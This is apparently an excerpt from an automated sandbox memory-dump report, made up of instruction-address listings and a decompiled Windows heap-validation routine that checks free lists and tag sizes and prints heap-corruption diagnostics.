                                                                                                                          0x00a84e8a
                                                                                                                          0x00a84e8a
                                                                                                                          0x00000000
                                                                                                                          0x00a84e3a
                                                                                                                          0x00a84e3e
                                                                                                                          0x00a84e43
                                                                                                                          0x00a84e47
                                                                                                                          0x00a84e53
                                                                                                                          0x00a84e58
                                                                                                                          0x00a84e5a
                                                                                                                          0x00a84e5c
                                                                                                                          0x00a84e61
                                                                                                                          0x00a84e61
                                                                                                                          0x00a84e5a
                                                                                                                          0x00a84e6e
                                                                                                                          0x00a84f41
                                                                                                                          0x00a84f47
                                                                                                                          0x00a84f4b
                                                                                                                          0x00a84f6a
                                                                                                                          0x00a84f6f
                                                                                                                          0x00a84f4d
                                                                                                                          0x00a84f62
                                                                                                                          0x00a84f67
                                                                                                                          0x00a84f7f
                                                                                                                          0x00a84f80
                                                                                                                          0x00a84f81
                                                                                                                          0x00000000
                                                                                                                          0x00a84e74
                                                                                                                          0x00a84e78
                                                                                                                          0x00a84e82
                                                                                                                          0x00a84e88
                                                                                                                          0x00a84e88
                                                                                                                          0x00000000
                                                                                                                          0x00a84e78
                                                                                                                          0x00a84e6e
                                                                                                                          0x00a84e38
                                                                                                                          0x00a84df3
                                                                                                                          0x00a84bfe
                                                                                                                          0x00a84c01
                                                                                                                          0x00a84c04
                                                                                                                          0x00a84c07
                                                                                                                          0x00a84c09
                                                                                                                          0x00a84c0c
                                                                                                                          0x00a84c0e
                                                                                                                          0x00a84c0e
                                                                                                                          0x00a84c11
                                                                                                                          0x00a84c11
                                                                                                                          0x00a84c0c
                                                                                                                          0x00a84c14
                                                                                                                          0x00a84c17
                                                                                                                          0x00a84dae
                                                                                                                          0x00a84db2
                                                                                                                          0x00a84db7
                                                                                                                          0x00a84dba
                                                                                                                          0x00a84dbd
                                                                                                                          0x00a84ef1
                                                                                                                          0x00a84ef7
                                                                                                                          0x00a84efb
                                                                                                                          0x00a84f1a
                                                                                                                          0x00a84f1f
                                                                                                                          0x00a84efd
                                                                                                                          0x00a84f12
                                                                                                                          0x00a84f17
                                                                                                                          0x00a84f2b
                                                                                                                          0x00a84f2b
                                                                                                                          0x00a84f2d
                                                                                                                          0x00a84f2e
                                                                                                                          0x00a84f2f
                                                                                                                          0x00000000
                                                                                                                          0x00a84f2f
                                                                                                                          0x00000000
                                                                                                                          0x00a84c1d
                                                                                                                          0x00a84c1d
                                                                                                                          0x00a84c20
                                                                                                                          0x00a84c23
                                                                                                                          0x00a84c26
                                                                                                                          0x00a84c29
                                                                                                                          0x00a84c2c
                                                                                                                          0x00a84c2e
                                                                                                                          0x00a84d91
                                                                                                                          0x00a84d91
                                                                                                                          0x00a84d92
                                                                                                                          0x00a84d97
                                                                                                                          0x00a84d9e
                                                                                                                          0x00000000
                                                                                                                          0x00a84d9e
                                                                                                                          0x00a84c34
                                                                                                                          0x00a84c37
                                                                                                                          0x00a84c39
                                                                                                                          0x00a84c3c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84c45
                                                                                                                          0x00a84c48
                                                                                                                          0x00a84c4e
                                                                                                                          0x00a84c50
                                                                                                                          0x00a84c78
                                                                                                                          0x00a84c78
                                                                                                                          0x00a84c7b
                                                                                                                          0x00a84c7d
                                                                                                                          0x00a84c80
                                                                                                                          0x00a84c84
                                                                                                                          0x00a84cad
                                                                                                                          0x00a84cad
                                                                                                                          0x00a84cb0
                                                                                                                          0x00a84cb8
                                                                                                                          0x00a84cbb
                                                                                                                          0x00a84cbe
                                                                                                                          0x00a84cc1
                                                                                                                          0x00a84cc7
                                                                                                                          0x00a84cdc
                                                                                                                          0x00a84cc9
                                                                                                                          0x00a84cd2
                                                                                                                          0x00a84cd4
                                                                                                                          0x00a84cd4
                                                                                                                          0x00a84cde
                                                                                                                          0x00a84ce0
                                                                                                                          0x00a84d13
                                                                                                                          0x00a84d13
                                                                                                                          0x00a84d16
                                                                                                                          0x00a84d18
                                                                                                                          0x00a84d29
                                                                                                                          0x00a84d2a
                                                                                                                          0x00a84d2c
                                                                                                                          0x00a84d34
                                                                                                                          0x00a84d1a
                                                                                                                          0x00a84d1a
                                                                                                                          0x00a84d1a
                                                                                                                          0x00a84d1d
                                                                                                                          0x00a84d1f
                                                                                                                          0x00a84d22
                                                                                                                          0x00a84d24
                                                                                                                          0x00a84d24
                                                                                                                          0x00a84d3c
                                                                                                                          0x00a84d3f
                                                                                                                          0x00a84d45
                                                                                                                          0x00a84d47
                                                                                                                          0x00a84d6c
                                                                                                                          0x00a84d6c
                                                                                                                          0x00a84d70
                                                                                                                          0x00a84d7e
                                                                                                                          0x00a84d84
                                                                                                                          0x00a84d84
                                                                                                                          0x00000000
                                                                                                                          0x00a84d49
                                                                                                                          0x00a84d49
                                                                                                                          0x00a84d56
                                                                                                                          0x00a84d56
                                                                                                                          0x00a84d59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84d4e
                                                                                                                          0x00a84d50
                                                                                                                          0x00a84d52
                                                                                                                          0x00a84d8e
                                                                                                                          0x00a84d5d
                                                                                                                          0x00a84d5f
                                                                                                                          0x00a84d67
                                                                                                                          0x00000000
                                                                                                                          0x00a84d67
                                                                                                                          0x00a84d54
                                                                                                                          0x00a84d54
                                                                                                                          0x00a84d5b
                                                                                                                          0x00000000
                                                                                                                          0x00a84d5b
                                                                                                                          0x00a84ce2
                                                                                                                          0x00a84ce2
                                                                                                                          0x00a84ce5
                                                                                                                          0x00a84ce5
                                                                                                                          0x00a84ce7
                                                                                                                          0x00a84cfb
                                                                                                                          0x00a84ce9
                                                                                                                          0x00a84ce9
                                                                                                                          0x00a84cec
                                                                                                                          0x00a84cef
                                                                                                                          0x00a84cf1
                                                                                                                          0x00a84cf3
                                                                                                                          0x00a84cf3
                                                                                                                          0x00a84cf3
                                                                                                                          0x00a84cf6
                                                                                                                          0x00a84cf6
                                                                                                                          0x00a84d02
                                                                                                                          0x00a84d05
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84d07
                                                                                                                          0x00a84d0f
                                                                                                                          0x00a84d11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84d11
                                                                                                                          0x00000000
                                                                                                                          0x00a84ce5
                                                                                                                          0x00a84ce0
                                                                                                                          0x00a84c8a
                                                                                                                          0x00a84c8f
                                                                                                                          0x00a84c91
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84c9d
                                                                                                                          0x00000000
                                                                                                                          0x00a84c9d
                                                                                                                          0x00a84c52
                                                                                                                          0x00a84c5f
                                                                                                                          0x00a84c5f
                                                                                                                          0x00a84c62
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84c57
                                                                                                                          0x00a84c59
                                                                                                                          0x00a84c5b
                                                                                                                          0x00a84caa
                                                                                                                          0x00a84c66
                                                                                                                          0x00a84c68
                                                                                                                          0x00a84c70
                                                                                                                          0x00a84c75
                                                                                                                          0x00000000
                                                                                                                          0x00a84c75
                                                                                                                          0x00a84c5d
                                                                                                                          0x00a84c5d
                                                                                                                          0x00a84c64
                                                                                                                          0x00000000
                                                                                                                          0x00a84c64
                                                                                                                          0x00a84c17
                                                                                                                          0x00a84b75
                                                                                                                          0x00a84bc4
                                                                                                                          0x00a84bc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84bd9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84b77
                                                                                                                          0x00a84b7a
                                                                                                                          0x00a84b8c
                                                                                                                          0x00a84b7c
                                                                                                                          0x00a84b7e
                                                                                                                          0x00a84b83
                                                                                                                          0x00a84b86
                                                                                                                          0x00a84b86
                                                                                                                          0x00a84b90
                                                                                                                          0x00a84b93
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84b95
                                                                                                                          0x00a84bab
                                                                                                                          0x00a84bb0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84bb2
                                                                                                                          0x00a84bb9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84bbb
                                                                                                                          0x00a84bbe
                                                                                                                          0x00a84bc1
                                                                                                                          0x00a84bc1
                                                                                                                          0x00000000
                                                                                                                          0x00a84bc1
                                                                                                                          0x00a84b97
                                                                                                                          0x00a84ba4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84ba6
                                                                                                                          0x00000000
                                                                                                                          0x00a84ba6
                                                                                                                          0x00a84ea9
                                                                                                                          0x00a84ea9
                                                                                                                          0x00a84eb2
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                          • API String ID: 0-3591852110
                                                                                                                          • Opcode ID: 3fdfaf0f1fded053b5903b64506a2fd7b3da44c50e78ea4297f157258095f68b
                                                                                                                          • Instruction ID: c789f932e3e35a37e24ec3e327034acdd6b3eda6a91b5245b94b96b295117271
                                                                                                                          • Opcode Fuzzy Hash: 3fdfaf0f1fded053b5903b64506a2fd7b3da44c50e78ea4297f157258095f68b
                                                                                                                          • Instruction Fuzzy Hash: 5512DC706046429FDB25EF28C495BBABBF5FF48714F18845DE8868B682D734EC80CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A84496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 56%
                                                                                                                          			E00A84496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E00A849A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0xab6378 = _t267;
						asm("int3");
						 *0xab6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E009F174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E009CB150();
							} else {
								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E009CB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E009CB150();
							} else {
								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E009CB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0xab6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E00A09660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E009F174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E009CB150();
										} else {
											E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E009CB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E009CB150();
									} else {
										E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E009CB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E009CB150();
								} else {
									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E009CB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E009CB150();
							} else {
								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E00A84AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E00A7FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E00A723E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                                                                          0x00a844a1
                                                                                                                          0x00a844a3
                                                                                                                          0x00a844a7
                                                                                                                          0x00a844ac
                                                                                                                          0x00a844af
                                                                                                                          0x00a844b2
                                                                                                                          0x00a844b9
                                                                                                                          0x00a844bc
                                                                                                                          0x00a847f2
                                                                                                                          0x00a847f2
                                                                                                                          0x00a847f8
                                                                                                                          0x00a847fc
                                                                                                                          0x00a847fe
                                                                                                                          0x00a84804
                                                                                                                          0x00a84805
                                                                                                                          0x00a84805
                                                                                                                          0x00a8480c
                                                                                                                          0x00a84810
                                                                                                                          0x00a84812
                                                                                                                          0x00a84812
                                                                                                                          0x00a84812
                                                                                                                          0x00a84822
                                                                                                                          0x00a84822
                                                                                                                          0x00a84827
                                                                                                                          0x00a84827
                                                                                                                          0x00000000
                                                                                                                          0x00a84827
                                                                                                                          0x00a844c4
                                                                                                                          0x00a844d3
                                                                                                                          0x00a844d9
                                                                                                                          0x00a844dc
                                                                                                                          0x00a844de
                                                                                                                          0x00a844e0
                                                                                                                          0x00a84560
                                                                                                                          0x00a84520
                                                                                                                          0x00a84522
                                                                                                                          0x00a84525
                                                                                                                          0x00a84528
                                                                                                                          0x00a8452b
                                                                                                                          0x00a8452e
                                                                                                                          0x00a84530
                                                                                                                          0x00a84697
                                                                                                                          0x00a8469d
                                                                                                                          0x00a846a1
                                                                                                                          0x00a846c0
                                                                                                                          0x00a846c5
                                                                                                                          0x00a846a3
                                                                                                                          0x00a846b8
                                                                                                                          0x00a846bd
                                                                                                                          0x00a846cb
                                                                                                                          0x00a846d4
                                                                                                                          0x00a84677
                                                                                                                          0x00a84677
                                                                                                                          0x00a84679
                                                                                                                          0x00a8467c
                                                                                                                          0x00a8468a
                                                                                                                          0x00a84690
                                                                                                                          0x00a84690
                                                                                                                          0x00a847f1
                                                                                                                          0x00a847f1
                                                                                                                          0x00a847f1
                                                                                                                          0x00000000
                                                                                                                          0x00a847f1
                                                                                                                          0x00a84536
                                                                                                                          0x00a84539
                                                                                                                          0x00a8453c
                                                                                                                          0x00a84636
                                                                                                                          0x00a8463c
                                                                                                                          0x00a84640
                                                                                                                          0x00a8465f
                                                                                                                          0x00a84664
                                                                                                                          0x00a84642
                                                                                                                          0x00a84657
                                                                                                                          0x00a8465c
                                                                                                                          0x00a84670
                                                                                                                          0x00000000
                                                                                                                          0x00a84542
                                                                                                                          0x00a84542
                                                                                                                          0x00a84546
                                                                                                                          0x00a84548
                                                                                                                          0x00a8454b
                                                                                                                          0x00a84555
                                                                                                                          0x00a8455b
                                                                                                                          0x00a8455b
                                                                                                                          0x00a8455b
                                                                                                                          0x00a8455d
                                                                                                                          0x00a8455d
                                                                                                                          0x00a8455d
                                                                                                                          0x00000000
                                                                                                                          0x00a8455d
                                                                                                                          0x00a8453c
                                                                                                                          0x00a84579
                                                                                                                          0x00a8457c
                                                                                                                          0x00a84587
                                                                                                                          0x00a84589
                                                                                                                          0x00a84591
                                                                                                                          0x00a84592
                                                                                                                          0x00a84597
                                                                                                                          0x00a84598
                                                                                                                          0x00a845a1
                                                                                                                          0x00a845ab
                                                                                                                          0x00a845ab
                                                                                                                          0x00a845a1
                                                                                                                          0x00a845ae
                                                                                                                          0x00a845b4
                                                                                                                          0x00a845b9
                                                                                                                          0x00a845bd
                                                                                                                          0x00a84759
                                                                                                                          0x00a84759
                                                                                                                          0x00a8475f
                                                                                                                          0x00a84761
                                                                                                                          0x00a84763
                                                                                                                          0x00a84765
                                                                                                                          0x00a84768
                                                                                                                          0x00a8476b
                                                                                                                          0x00a8476d
                                                                                                                          0x00a8479c
                                                                                                                          0x00a8479c
                                                                                                                          0x00a8479f
                                                                                                                          0x00a847a2
                                                                                                                          0x00a847a4
                                                                                                                          0x00a84830
                                                                                                                          0x00a84833
                                                                                                                          0x00a84879
                                                                                                                          0x00a8487d
                                                                                                                          0x00a848f1
                                                                                                                          0x00a848f3
                                                                                                                          0x00a848f3
                                                                                                                          0x00000000
                                                                                                                          0x00a848f3
                                                                                                                          0x00a8487f
                                                                                                                          0x00a84885
                                                                                                                          0x00a84887
                                                                                                                          0x00a848a8
                                                                                                                          0x00a848a8
                                                                                                                          0x00a848ae
                                                                                                                          0x00a848b0
                                                                                                                          0x00a848dc
                                                                                                                          0x00a848dc
                                                                                                                          0x00a848dc
                                                                                                                          0x00a848dc
                                                                                                                          0x00a848ec
                                                                                                                          0x00000000
                                                                                                                          0x00a848ec
                                                                                                                          0x00a848b2
                                                                                                                          0x00a848bc
                                                                                                                          0x00a848be
                                                                                                                          0x00a848c1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848c3
                                                                                                                          0x00a848c3
                                                                                                                          0x00a848c6
                                                                                                                          0x00a848c9
                                                                                                                          0x00a848cc
                                                                                                                          0x00a848d1
                                                                                                                          0x00a848d4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848d6
                                                                                                                          0x00a848d7
                                                                                                                          0x00a848da
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848da
                                                                                                                          0x00a8494f
                                                                                                                          0x00a84955
                                                                                                                          0x00a84959
                                                                                                                          0x00a84978
                                                                                                                          0x00a8497d
                                                                                                                          0x00a8495b
                                                                                                                          0x00a84970
                                                                                                                          0x00a84975
                                                                                                                          0x00a84986
                                                                                                                          0x00a84987
                                                                                                                          0x00a8498a
                                                                                                                          0x00a8498d
                                                                                                                          0x00a84997
                                                                                                                          0x00a847ef
                                                                                                                          0x00a847ef
                                                                                                                          0x00a847ef
                                                                                                                          0x00000000
                                                                                                                          0x00a847ef
                                                                                                                          0x00a84890
                                                                                                                          0x00a84890
                                                                                                                          0x00a84891
                                                                                                                          0x00a84891
                                                                                                                          0x00a84894
                                                                                                                          0x00a84897
                                                                                                                          0x00a8489d
                                                                                                                          0x00a848a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848a2
                                                                                                                          0x00a848a3
                                                                                                                          0x00a848a6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848a6
                                                                                                                          0x00a848fb
                                                                                                                          0x00a84901
                                                                                                                          0x00a84905
                                                                                                                          0x00a84924
                                                                                                                          0x00a84929
                                                                                                                          0x00a84907
                                                                                                                          0x00a8491c
                                                                                                                          0x00a84921
                                                                                                                          0x00a8492f
                                                                                                                          0x00a84935
                                                                                                                          0x00a84936
                                                                                                                          0x00a84939
                                                                                                                          0x00a84942
                                                                                                                          0x00000000
                                                                                                                          0x00a84947
                                                                                                                          0x00a84835
                                                                                                                          0x00a8483b
                                                                                                                          0x00a8483f
                                                                                                                          0x00a8485e
                                                                                                                          0x00a84863
                                                                                                                          0x00a84841
                                                                                                                          0x00a84856
                                                                                                                          0x00a8485b
                                                                                                                          0x00a84869
                                                                                                                          0x00a8486c
                                                                                                                          0x00a8486f
                                                                                                                          0x00a847e7
                                                                                                                          0x00a847e7
                                                                                                                          0x00000000
                                                                                                                          0x00a847ec
                                                                                                                          0x00a847aa
                                                                                                                          0x00a847b0
                                                                                                                          0x00a847b4
                                                                                                                          0x00a847d3
                                                                                                                          0x00a847d8
                                                                                                                          0x00a847b6
                                                                                                                          0x00a847cb
                                                                                                                          0x00a847d0
                                                                                                                          0x00a847de
                                                                                                                          0x00a847df
                                                                                                                          0x00a847e2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8476f
                                                                                                                          0x00a8476f
                                                                                                                          0x00a84778
                                                                                                                          0x00a84785
                                                                                                                          0x00a84787
                                                                                                                          0x00a8478c
                                                                                                                          0x00a8478e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84790
                                                                                                                          0x00a84792
                                                                                                                          0x00a84794
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a84796
                                                                                                                          0x00a84799
                                                                                                                          0x00000000
                                                                                                                          0x00a84799
                                                                                                                          0x00000000
                                                                                                                          0x00a845c3
                                                                                                                          0x00a845c3
                                                                                                                          0x00a845c7
                                                                                                                          0x00a845c7
                                                                                                                          0x00a845ca
                                                                                                                          0x00a845cf
                                                                                                                          0x00a845d3
                                                                                                                          0x00a845df
                                                                                                                          0x00a845e4
                                                                                                                          0x00a845e6
                                                                                                                          0x00a845e8
                                                                                                                          0x00a845ed
                                                                                                                          0x00a845ed
                                                                                                                          0x00a845f2
                                                                                                                          0x00a845f2
                                                                                                                          0x00a845f7
                                                                                                                          0x00a845fc
                                                                                                                          0x00a84602
                                                                                                                          0x00a84606
                                                                                                                          0x00a84609
